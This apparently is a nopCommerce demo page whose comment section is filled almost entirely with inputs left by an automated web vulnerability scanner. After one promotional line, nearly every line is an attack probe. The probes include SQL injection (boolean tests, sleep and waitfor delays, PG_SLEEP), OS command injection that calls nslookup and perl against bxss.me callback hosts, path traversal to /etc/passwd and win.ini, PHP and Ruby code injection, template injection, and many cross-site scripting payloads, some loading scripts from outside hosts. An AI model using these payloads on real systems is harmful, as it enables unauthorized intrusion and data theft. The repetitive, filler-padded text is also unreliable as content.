nopCommerce includes everything you need to begin your e-commerce online store. We have thought of everything and it's all included!
This is a sample comment...
555
1Dz6vPamzYO
response.write(9278316*9498399)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
-1 OR 2+455-455-1=0+0+0+1 --
'+response.write(9278316*9498399)+'
echo baoxrr$()\ ubvbpt\nz^xyu||a #' &echo baoxrr$()\ ubvbpt\nz^xyu||a #|" &echo baoxrr$()\ ubvbpt\nz^xyu||a #
-1 OR 2+755-755-1=0+0+0+1
"+response.write(9278316*9498399)+"
MgUizcEl
-1' OR 2+20-20-1=0+0+0+1 --
&echo moiwsp$()\ sogpcx\nz^xyu||a #' &echo moiwsp$()\ sogpcx\nz^xyu||a #|" &echo moiwsp$()\ sogpcx\nz^xyu||a #
-1' OR 2+534-534-1=0+0+0+1 or 'jDa5Ssac'='
|echo xqvnsc$()\ pbgixe\nz^xyu||a #' |echo xqvnsc$()\ pbgixe\nz^xyu||a #|" |echo xqvnsc$()\ pbgixe\nz^xyu||a #
-1" OR 2+583-583-1=0+0+0+1 --
555bcc:074625.478-191599.478.ed25d.19285.2@bxss.me
(nslookup hitkfxrdeawksd3ee2.bxss.me||perl -e "gethostbyname('hitkfxrdeawksd3ee2.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
to@example.com>bcc:074625.478-191600.478.ed25d.19285.2@bxss.me
$(nslookup hitivhybikqef9eca2.bxss.me||perl -e "gethostbyname('hitivhybikqef9eca2.bxss.me')")
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
&nslookup hitbnpnpwccubbe202.bxss.me&'\"`0&nslookup hitbnpnpwccubbe202.bxss.me&`'
if(now()=sysdate(),sleep(15),0)
${9999533+9999900}
555<esi:include src="http://bxss.me/rpb.png"/>
../555
&(nslookup hitupklxkjsuz4ee3a.bxss.me||perl -e "gethostbyname('hitupklxkjsuz4ee3a.bxss.me')")&'\"`0&(nslookup hitupklxkjsuz4ee3a.bxss.me||perl -e "gethostbyname('hitupklxkjsuz4ee3a.bxss.me')")&`'
|(nslookup hitaxhbxjleeq12fb9.bxss.me||perl -e "gethostbyname('hitaxhbxjleeq12fb9.bxss.me')")
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
`(nslookup hitetawjmeowz42540.bxss.me||perl -e "gethostbyname('hitetawjmeowz42540.bxss.me')")`
;(nslookup hitfcyymoragp16914.bxss.me||perl -e "gethostbyname('hitfcyymoragp16914.bxss.me')")|(nslookup hitfcyymoragp16914.bxss.me||perl -e "gethostbyname('hitfcyymoragp16914.bxss.me')")&(nslookup hitfcyymoragp16914.bxss.me||perl -e "gethostbyname('hitfcyymoragp16914.bxss.me')")
555&n997974=v929584
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
)
'"()
!(()&&!|*|*|
Http://bxss.me/t/fit.txt
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
^(#$!@#$)(()))******
http://bxss.me/t/fit.txt?.jpg
/etc/shells
c:/windows/win.ini
555'&&sleep(27*1000)*frzlji&&'
bxss.me
555"&&sleep(27*1000)*lnastl&&"
-1; waitfor delay '0:0:15' --
555'||sleep(27*1000)*oegwvd||'
'.gethostbyname(lc('hitmb'.'fopocllfaa1c6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(81).chr(116).chr(76).'
555"||sleep(27*1000)*glmzvm||"
".gethostbyname(lc("hitej"."fsekqarx8f41d.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(66).chr(99).chr(69)."
-1); waitfor delay '0:0:15' --
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
-1)); waitfor delay '0:0:15' --
';print(md5(31337));$a='
";print(md5(31337));$a="
1 waitfor delay '0:0:15' --
"+"A".concat(70-3).concat(22*4).concat(102).concat(82).concat(113).concat(90)+(require"socket"Socket.gethostbyname("hitmj"+"dfscoejve7cbf.bxss.me.")[3].to_s)+"
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
${@print(md5(31337))}
'+'A'.concat(70-3).concat(22*4).concat(114).concat(65).concat(108).concat(72)+(require'socket'Socket.gethostbyname('hitqi'+'kgurwuovb50a4.bxss.me.')[3].to_s)+'
${@print(md5(31337))}\
'.print(md5(31337)).'
avqGIjnF'; waitfor delay '0:0:15' --
nopcommerce-new-release
nopcommerce-new-release/.
cfknSn0l'); waitfor delay '0:0:15' --
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
SbEV3wJk')); waitfor delay '0:0:15' --
xfs.bxss.me
-5 OR 989=(SELECT 989 FROM PG_SLEEP(15))--
'"
-5) OR 272=(SELECT 272 FROM PG_SLEEP(15))--
-1)) OR 791=(SELECT 791 FROM PG_SLEEP(15))--
<!--
KhMG9jtm' OR 138=(SELECT 138 FROM PG_SLEEP(15))--
xcmskSiC') OR 964=(SELECT 964 FROM PG_SLEEP(15))--
555'"()&%<zzz><ScRiPt >bRMJ(9604)</ScRiPt>
8Ai86zzK')) OR 340=(SELECT 340 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'"()&%<zzz><ScRiPt >bRMJ(9191)</ScRiPt>
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
5559797686
1'"
bfg8240<s1﹥s2ʺs3ʹhjl8240
@@5XXvs
bfgx5629%C0%BEz1%C0%BCz2a%90bcxhjl5629
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >bRMJ(9316)</ScRiPt>
555<WUE8LH>FIPSS[!+!]</WUE8LH>
555<script>bRMJ(9684)</script>
555<ScR<ScRiPt>IpT>bRMJ(9391)</sCr<ScRiPt>IpT>
555<ScRiPt >bRMJ(9585)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9204></ScRiPt>
555<isindex type=image src=1 onerror=bRMJ(9083)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9523'>
555<body onload=bRMJ(9187)>
555<img src=//xss.bxss.me/t/dot.gif onload=bRMJ(9285)>
555<img src=xyz OnErRor=bRMJ(9524)>
555<img/src=">" onerror=alert(9835)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%62%52%4D%4A%289709%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\bRMJ(9603)\u003C/sCripT\u003E
555<ScRiPt>bRMJ(9592)</sCripT>
%F6<img zzz onmouseover=bRMJ(91251) //%F6>
555<input autofocus onfocus=bRMJ(9583)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(bRMJ(9849))}
555TEu1g<ScRiPt >bRMJ(9623)</ScRiPt>
555<WY4AS7>OSLXQ[!+!]</WY4AS7>
555<ifRAme sRc=9234.com></IfRamE>
555<a3ypo33 x=9677>
555<img sRc='http://attacker-9109/log.php?
555<apnCSAJ<
-1 OR 2+500-500-1=0+0+0+1 --
-1 OR 2+822-822-1=0+0+0+1
-1' OR 2+328-328-1=0+0+0+1 --
555'"()&%<zzz><ScRiPt >16BQ(9570)</ScRiPt>
-1' OR 2+471-471-1=0+0+0+1 or 'tHQy7zxr'='
-1" OR 2+960-960-1=0+0+0+1 --
response.write(9168874*9731759)
'+response.write(9168874*9731759)+'
'"()&%<zzz><ScRiPt >16BQ(9000)</ScRiPt>
"+response.write(9168874*9731759)+"
echo uexlwh$()\ usjdib\nz^xyu||a #' &echo uexlwh$()\ usjdib\nz^xyu||a #|" &echo uexlwh$()\ usjdib\nz^xyu||a #
&echo fhczne$()\ oxjekb\nz^xyu||a #' &echo fhczne$()\ oxjekb\nz^xyu||a #|" &echo fhczne$()\ oxjekb\nz^xyu||a #
5559982524
|echo nxgwub$()\ vohjgk\nz^xyu||a #' |echo nxgwub$()\ vohjgk\nz^xyu||a #|" |echo nxgwub$()\ vohjgk\nz^xyu||a #
(nslookup hitzfeugprvuzc0990.bxss.me||perl -e "gethostbyname('hitzfeugprvuzc0990.bxss.me')")
dWGdMS4n
$(nslookup hitqpsbbmcshaa6218.bxss.me||perl -e "gethostbyname('hitqpsbbmcshaa6218.bxss.me')")
555bcc:074625.478-205063.478.ed25d.19285.2@bxss.me
to@example.com>bcc:074625.478-205064.478.ed25d.19285.2@bxss.me
&nslookup hitndwlyowvhz81ff0.bxss.me&'\"`0&nslookup hitndwlyowvhz81ff0.bxss.me&`'
&(nslookup hitfclmwtyxotb85e7.bxss.me||perl -e "gethostbyname('hitfclmwtyxotb85e7.bxss.me')")&'\"`0&(nslookup hitfclmwtyxotb85e7.bxss.me||perl -e "gethostbyname('hitfclmwtyxotb85e7.bxss.me')")&`'
|(nslookup hitojfygabymc95c6c.bxss.me||perl -e "gethostbyname('hitojfygabymc95c6c.bxss.me')")
${10000248+9999422}
`(nslookup hitzhjlntggmx063fb.bxss.me||perl -e "gethostbyname('hitzhjlntggmx063fb.bxss.me')")`
;(nslookup hitxhccmjdven0fa55.bxss.me||perl -e "gethostbyname('hitxhccmjdven0fa55.bxss.me')")|(nslookup hitxhccmjdven0fa55.bxss.me||perl -e "gethostbyname('hitxhccmjdven0fa55.bxss.me')")&(nslookup hitxhccmjdven0fa55.bxss.me||perl -e "gethostbyname('hitxhccmjdven0fa55.bxss.me')")
555&n963902=v913103
KdDsk5Aa'; waitfor delay '0:0:15' --
'.gethostbyname(lc('hites'.'ieeqclkif7997.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(68).chr(110).chr(77).'
pdCFLT27'); waitfor delay '0:0:15' --
".gethostbyname(lc("hitxf"."munbceuwa18d9.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(70).chr(105).chr(80)."
555'&&sleep(27*1000)*qcajoo&&'
CgY1ABPz')); waitfor delay '0:0:15' --
555"&&sleep(27*1000)*xizkkg&&"
555'||sleep(27*1000)*gosdsw||'
-5 OR 396=(SELECT 396 FROM PG_SLEEP(15))--
555"||sleep(27*1000)*oywlel||"
-5) OR 680=(SELECT 680 FROM PG_SLEEP(15))--
"+"A".concat(70-3).concat(22*4).concat(112).concat(66).concat(99).concat(89)+(require"socket"Socket.gethostbyname("hitgc"+"eyklkspf342ca.bxss.me.")[3].to_s)+"
-1)) OR 809=(SELECT 809 FROM PG_SLEEP(15))--
'+'A'.concat(70-3).concat(22*4).concat(117).concat(71).concat(119).concat(67)+(require'socket'Socket.gethostbyname('hitwf'+'ysllafjca05f2.bxss.me.')[3].to_s)+'
FU44UpMU' OR 712=(SELECT 712 FROM PG_SLEEP(15))--
oUXvmOQc') OR 836=(SELECT 836 FROM PG_SLEEP(15))--
igSyUKRT')) OR 511=(SELECT 511 FROM PG_SLEEP(15))--
555'"()&%<zzz><ScRiPt >ghsC(9215)</ScRiPt>
@@qTvyi
'"()&%<zzz><ScRiPt >ghsC(9939)</ScRiPt>
5559903742
bfg9837<s1﹥s2ʺs3ʹhjl9837
bfgx5799%C0%BEz1%C0%BCz2a%90bcxhjl5799
555<ScRiPt >ghsC(9510)</ScRiPt>
555<W1OD5V>5XNOK[!+!]</W1OD5V>
555<script>ghsC(9333)</script>
555<ScR<ScRiPt>IpT>ghsC(9929)</sCr<ScRiPt>IpT>
555<ScRiPt >ghsC(9934)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9338></ScRiPt>
555<isindex type=image src=1 onerror=ghsC(9843)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9636'>
555<body onload=ghsC(9106)>
555<img src=//xss.bxss.me/t/dot.gif onload=ghsC(9701)>
555<img src=xyz OnErRor=ghsC(9776)>
555<img/src=">" onerror=alert(9237)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%67%68%73%43%289329%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\ghsC(9972)\u003C/sCripT\u003E
555<ScRiPt>ghsC(9373)</sCripT>
%F6<img zzz onmouseover=ghsC(95011) //%F6>
555<input autofocus onfocus=ghsC(9697)>
555}body{zzz:Expre/**/SSion(ghsC(9349))}
5558I3n5<ScRiPt >ghsC(9631)</ScRiPt>
555<WX2ULS>2OGYN[!+!]</WX2ULS>
555<ifRAme sRc=9395.com></IfRamE>
555<aPuM7j5 x=9490>
555<img sRc='http://attacker-9609/log.php?
555<aqqi0pH<
555'"()&%<zzz><ScRiPt >6RXv(9511)</ScRiPt>
-1 OR 2+261-261-1=0+0+0+1 --
response.write(9872760*9834887)
-1 OR 2+597-597-1=0+0+0+1
'+response.write(9872760*9834887)+'
echo tzojpi$()\ wapcra\nz^xyu||a #' &echo tzojpi$()\ wapcra\nz^xyu||a #|" &echo tzojpi$()\ wapcra\nz^xyu||a #
"+response.write(9872760*9834887)+"
-1' OR 2+784-784-1=0+0+0+1 --
&echo zjtxzn$()\ mqlxwd\nz^xyu||a #' &echo zjtxzn$()\ mqlxwd\nz^xyu||a #|" &echo zjtxzn$()\ mqlxwd\nz^xyu||a #
'"()&%<zzz><ScRiPt >6RXv(9758)</ScRiPt>
|echo vjotsj$()\ xeqyvo\nz^xyu||a #' |echo vjotsj$()\ xeqyvo\nz^xyu||a #|" |echo vjotsj$()\ xeqyvo\nz^xyu||a #
-1' OR 2+705-705-1=0+0+0+1 or 'tFe7iqSM'='
-1" OR 2+511-511-1=0+0+0+1 --
(nslookup hittnegchlxpa6cd78.bxss.me||perl -e "gethostbyname('hittnegchlxpa6cd78.bxss.me')")
$(nslookup hitblenqyobma34e40.bxss.me||perl -e "gethostbyname('hitblenqyobma34e40.bxss.me')")
&nslookup hittvdfmoamku1a3e2.bxss.me&'\"`0&nslookup hittvdfmoamku1a3e2.bxss.me&`'
5559765755
8tLyI5vq
&(nslookup hitcwteomhkyj336f7.bxss.me||perl -e "gethostbyname('hitcwteomhkyj336f7.bxss.me')")&'\"`0&(nslookup hitcwteomhkyj336f7.bxss.me||perl -e "gethostbyname('hitcwteomhkyj336f7.bxss.me')")&`'
|(nslookup hitcgaksppcave49c8.bxss.me||perl -e "gethostbyname('hitcgaksppcave49c8.bxss.me')")
`(nslookup hitxlrsuzkrqa2ecaf.bxss.me||perl -e "gethostbyname('hitxlrsuzkrqa2ecaf.bxss.me')")`
;(nslookup hitsifwvydesi4d904.bxss.me||perl -e "gethostbyname('hitsifwvydesi4d904.bxss.me')")|(nslookup hitsifwvydesi4d904.bxss.me||perl -e "gethostbyname('hitsifwvydesi4d904.bxss.me')")&(nslookup hitsifwvydesi4d904.bxss.me||perl -e "gethostbyname('hitsifwvydesi4d904.bxss.me')")
${9999096+9999136}
555bcc:074625.478-212448.478.ed25d.19285.2@bxss.me
to@example.com>bcc:074625.478-212455.478.ed25d.19285.2@bxss.me
555&n955914=v904410
'.gethostbyname(lc('hitgj'.'qtlnegdj305b2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(84).chr(104).chr(76).'
".gethostbyname(lc("hitqy"."miulqfkse63c7.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(65).chr(104).chr(70)."
555'&&sleep(27*1000)*apyene&&'
555"&&sleep(27*1000)*atyymi&&"
555'||sleep(27*1000)*hfrqgd||'
555"||sleep(27*1000)*ayzijf||"
"+"A".concat(70-3).concat(22*4).concat(111).concat(67).concat(120).concat(72)+(require"socket"Socket.gethostbyname("hiteg"+"fnkcehtl30d10.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(103).concat(90).concat(120).concat(72)+(require'socket'Socket.gethostbyname('hitla'+'csaktdxs269a0.bxss.me.')[3].to_s)+'
FkBpd3AD'; waitfor delay '0:0:15' --
CPqFtfKi'); waitfor delay '0:0:15' --
4936C6tF')); waitfor delay '0:0:15' --
555'"()&%<zzz><ScRiPt >EHFb(9706)</ScRiPt>
-5 OR 543=(SELECT 543 FROM PG_SLEEP(15))--
'"()&%<zzz><ScRiPt >EHFb(9169)</ScRiPt>
-5) OR 405=(SELECT 405 FROM PG_SLEEP(15))--
5559724529
-1)) OR 943=(SELECT 943 FROM PG_SLEEP(15))--
tVTII6DB' OR 872=(SELECT 872 FROM PG_SLEEP(15))--
1jLrVUNL') OR 535=(SELECT 535 FROM PG_SLEEP(15))--
bfg4629<s1﹥s2ʺs3ʹhjl4629
TwDLAkkE')) OR 806=(SELECT 806 FROM PG_SLEEP(15))--
bfgx4676%C0%BEz1%C0%BCz2a%90bcxhjl4676
@@jNPSe
555<ScRiPt >EHFb(9467)</ScRiPt>
555<WDFL7B>EAZTY[!+!]</WDFL7B>
555<script>EHFb(9547)</script>
555<ScR<ScRiPt>IpT>EHFb(9139)</sCr<ScRiPt>IpT>
555<ScRiPt >EHFb(9528)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9919></ScRiPt>
555<isindex type=image src=1 onerror=EHFb(9809)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9908'>
555<body onload=EHFb(9316)>
555<img src=//xss.bxss.me/t/dot.gif onload=EHFb(9435)>
555<img src=xyz OnErRor=EHFb(9756)>
555<img/src=">" onerror=alert(9311)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%45%48%46%62%289678%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\EHFb(9689)\u003C/sCripT\u003E
555<ScRiPt>EHFb(9780)</sCripT>
%F6<img zzz onmouseover=EHFb(91191) //%F6>
555<input autofocus onfocus=EHFb(9572)>
555}body{zzz:Expre/**/SSion(EHFb(9891))}
5558Uss9<ScRiPt >EHFb(9799)</ScRiPt>
555<WEBMUM>C8NYE[!+!]</WEBMUM>
555<ifRAme sRc=9196.com></IfRamE>
555<aq7pSir x=9932>
555<img sRc='http://attacker-9772/log.php?
555<atLooYu<
555'"()&%<zzz><ScRiPt >g0Qm(9004)</ScRiPt>
'"()&%<zzz><ScRiPt >g0Qm(9739)</ScRiPt>
5559917501
bfg9088<s1﹥s2ʺs3ʹhjl9088
bfgx5383%C0%BEz1%C0%BCz2a%90bcxhjl5383
555<ScRiPt >g0Qm(9915)</ScRiPt>
555<W0UUBI>SRUNF[!+!]</W0UUBI>
555<script>g0Qm(9905)</script>
555<ScR<ScRiPt>IpT>g0Qm(9109)</sCr<ScRiPt>IpT>
555<ScRiPt >g0Qm(9449)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9595></ScRiPt>
555<isindex type=image src=1 onerror=g0Qm(9552)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9069'>
555<body onload=g0Qm(9398)>
555<img src=//xss.bxss.me/t/dot.gif onload=g0Qm(9887)>
555<img src=xyz OnErRor=g0Qm(9514)>
555<img/src=">" onerror=alert(9625)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%67%30%51%6D%289497%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\g0Qm(9149)\u003C/sCripT\u003E
555<ScRiPt>g0Qm(9093)</sCripT>
%F6<img zzz onmouseover=g0Qm(93731) //%F6>
555<input autofocus onfocus=g0Qm(9007)>
555}body{zzz:Expre/**/SSion(g0Qm(9903))}
5556wBSw<ScRiPt >g0Qm(9998)</ScRiPt>
555<WHVPD6>IZIWX[!+!]</WHVPD6>
555<ifRAme sRc=9495.com></IfRamE>
555<apGaHn9 x=9980>
555<img sRc='http://attacker-9229/log.php?
555<aAwQSGx<
This is a sample comment...
555
1Dz6vPamzYO
555
555
555
response.write(9278316*9498399)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
-1 OR 2+455-455-1=0+0+0+1 --
'+response.write(9278316*9498399)+'
555
echo baoxrr$()\ ubvbpt\nz^xyu||a #' &echo baoxrr$()\ ubvbpt\nz^xyu||a #|" &echo baoxrr$()\ ubvbpt\nz^xyu||a #
-1 OR 2+755-755-1=0+0+0+1
"+response.write(9278316*9498399)+"
MgUizcEl
-1' OR 2+20-20-1=0+0+0+1 --
555
&echo moiwsp$()\ sogpcx\nz^xyu||a #' &echo moiwsp$()\ sogpcx\nz^xyu||a #|" &echo moiwsp$()\ sogpcx\nz^xyu||a #
-1' OR 2+534-534-1=0+0+0+1 or 'jDa5Ssac'='
555
|echo xqvnsc$()\ pbgixe\nz^xyu||a #' |echo xqvnsc$()\ pbgixe\nz^xyu||a #|" |echo xqvnsc$()\ pbgixe\nz^xyu||a #
555
-1" OR 2+583-583-1=0+0+0+1 --
555
bcc:074625.478-191599.478.ed25d.19285.2@bxss.me
(nslookup hitkfxrdeawksd3ee2.bxss.me||perl -e "gethostbyname('hitkfxrdeawksd3ee2.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
555
to@example.com>
bcc:074625.478-191600.478.ed25d.19285.2@bxss.me
$(nslookup hitivhybikqef9eca2.bxss.me||perl -e "gethostbyname('hitivhybikqef9eca2.bxss.me')")
../../../../../../../../../../../../../../windows/win.ini
555
file:///etc/passwd
&nslookup hitbnpnpwccubbe202.bxss.me&'\"`0&nslookup hitbnpnpwccubbe202.bxss.me&`'
555
if(now()=sysdate(),sleep(15),0)
555
${9999533+9999900}
555<esi:include src="http://bxss.me/rpb.png"/>
555
../555
&(nslookup hitupklxkjsuz4ee3a.bxss.me||perl -e "gethostbyname('hitupklxkjsuz4ee3a.bxss.me')")&'\"`0&(nslookup hitupklxkjsuz4ee3a.bxss.me||perl -e "gethostbyname('hitupklxkjsuz4ee3a.bxss.me')")&`'
555
555
555
|(nslookup hitaxhbxjleeq12fb9.bxss.me||perl -e "gethostbyname('hitaxhbxjleeq12fb9.bxss.me')")
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
`(nslookup hitetawjmeowz42540.bxss.me||perl -e "gethostbyname('hitetawjmeowz42540.bxss.me')")`
555
555
;(nslookup hitfcyymoragp16914.bxss.me||perl -e "gethostbyname('hitfcyymoragp16914.bxss.me')")|(nslookup hitfcyymoragp16914.bxss.me||perl -e "gethostbyname('hitfcyymoragp16914.bxss.me')")&(nslookup hitfcyymoragp16914.bxss.me||perl -e "gethostbyname('hitfcyymoragp16914.bxss.me')")
555
555
555&n997974=v929584
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
)
555
'"()
!(()&&!|*|*|
555
Http://bxss.me/t/fit.txt
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
^(#$!@#$)(()))******
http://bxss.me/t/fit.txt?.jpg
555
555
/etc/shells
555
555
555
c:/windows/win.ini
555'&&sleep(27*1000)*frzlji&&'
555
555
bxss.me
555
555"&&sleep(27*1000)*lnastl&&"
-1; waitfor delay '0:0:15' --
555
555'||sleep(27*1000)*oegwvd||'
555
555
555
'.gethostbyname(lc('hitmb'.'fopocllfaa1c6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(81).chr(116).chr(76).'
555"||sleep(27*1000)*glmzvm||"
555
555
".gethostbyname(lc("hitej"."fsekqarx8f41d.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(66).chr(99).chr(69)."
-1); waitfor delay '0:0:15' --
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
-1)); waitfor delay '0:0:15' --
';print(md5(31337));$a='
555
555
555
555
";print(md5(31337));$a="
1 waitfor delay '0:0:15' --
"+"A".concat(70-3).concat(22*4).concat(102).concat(82).concat(113).concat(90)+(require"socket"
Socket.gethostbyname("hitmj"+"dfscoejve7cbf.bxss.me.")[3].to_s)+"
HttP://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
${@print(md5(31337))}
555
'+'A'.concat(70-3).concat(22*4).concat(114).concat(65).concat(108).concat(72)+(require'socket'
Socket.gethostbyname('hitqi'+'kgurwuovb50a4.bxss.me.')[3].to_s)+'
555
555
${@print(md5(31337))}\
555
555
555
'.print(md5(31337)).'
avqGIjnF'; waitfor delay '0:0:15' --
nopcommerce-new-release
555
555
555
nopcommerce-new-release/.
555
555
cfknSn0l'); waitfor delay '0:0:15' --
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
SbEV3wJk')); waitfor delay '0:0:15' --
555
555
555
xfs.bxss.me
555
555
555
-5 OR 989=(SELECT 989 FROM PG_SLEEP(15))--
'"
-5) OR 272=(SELECT 272 FROM PG_SLEEP(15))--
-1)) OR 791=(SELECT 791 FROM PG_SLEEP(15))--
<!--
KhMG9jtm' OR 138=(SELECT 138 FROM PG_SLEEP(15))--
555
xcmskSiC') OR 964=(SELECT 964 FROM PG_SLEEP(15))--
555
555
555'"()&%<zzz><ScRiPt >bRMJ(9604)</ScRiPt>
8Ai86zzK')) OR 340=(SELECT 340 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
'"()&%<zzz><ScRiPt >bRMJ(9191)</ScRiPt>
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
5559797686
1'"
555
555
555
bfg8240<s1﹥s2ʺs3ʹhjl8240
@@5XXvs
555
555
bfgx5629%C0%BEz1%C0%BCz2a%90bcxhjl5629
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
dfb{{98991*97996}}xca
555
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >bRMJ(9316)</ScRiPt>
555<WUE8LH>FIPSS[!+!]</WUE8LH>
555<script>bRMJ(9684)</script>
555
555<ScR<ScRiPt>IpT>bRMJ(9391)</sCr<ScRiPt>IpT>
555<ScRiPt
>bRMJ(9585)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9204></ScRiPt>
555
555<isindex type=image src=1 onerror=bRMJ(9083)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9523'>
555<body onload=bRMJ(9187)>
555<img src=//xss.bxss.me/t/dot.gif onload=bRMJ(9285)>
555
555<img src=xyz OnErRor=bRMJ(9524)>
555<img/src=">" onerror=alert(9835)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%62%52%4D%4A%289709%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\bRMJ(9603)\u003C/sCripT\u003E
555<ScRiPt>bRMJ(9592)</sCripT>
%F6<img zzz onmouseover=bRMJ(91251) //%F6>
555
555<input autofocus onfocus=bRMJ(9583)>
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(bRMJ(9849))}
555TEu1g
<ScRiPt >bRMJ(9623)</ScRiPt>
555
555<WY4AS7>OSLXQ[!+!]</WY4AS7>
555<ifRAme sRc=9234.com></IfRamE>
555<a3ypo33 x=9677>
555
555
555<img sRc='http://attacker-9109/log.php?
555
555<apnCSAJ<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+500-500-1=0+0+0+1 --
-1 OR 2+822-822-1=0+0+0+1
-1' OR 2+328-328-1=0+0+0+1 --
555'"()&%<zzz><ScRiPt >16BQ(9570)</ScRiPt>
555
-1' OR 2+471-471-1=0+0+0+1 or 'tHQy7zxr'='
-1" OR 2+960-960-1=0+0+0+1 --
555
555
if(now()=sysdate(),sleep(15),0)
response.write(9168874*9731759)
555
'+response.write(9168874*9731759)+'
'"()&%<zzz><ScRiPt >16BQ(9000)</ScRiPt>
/../../../../../../../../../../windows/system32/BITSADMIN.exe
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
"+response.write(9168874*9731759)+"
555
555
555
echo uexlwh$()\ usjdib\nz^xyu||a #' &echo uexlwh$()\ usjdib\nz^xyu||a #|" &echo uexlwh$()\ usjdib\nz^xyu||a #
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
&echo fhczne$()\ oxjekb\nz^xyu||a #' &echo fhczne$()\ oxjekb\nz^xyu||a #|" &echo fhczne$()\ oxjekb\nz^xyu||a #
5559982524
555
|echo nxgwub$()\ vohjgk\nz^xyu||a #' |echo nxgwub$()\ vohjgk\nz^xyu||a #|" |echo nxgwub$()\ vohjgk\nz^xyu||a #
555
555
(nslookup hitzfeugprvuzc0990.bxss.me||perl -e "gethostbyname('hitzfeugprvuzc0990.bxss.me')")
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
dWGdMS4n
../../../../../../../../../../../../../../etc/passwd
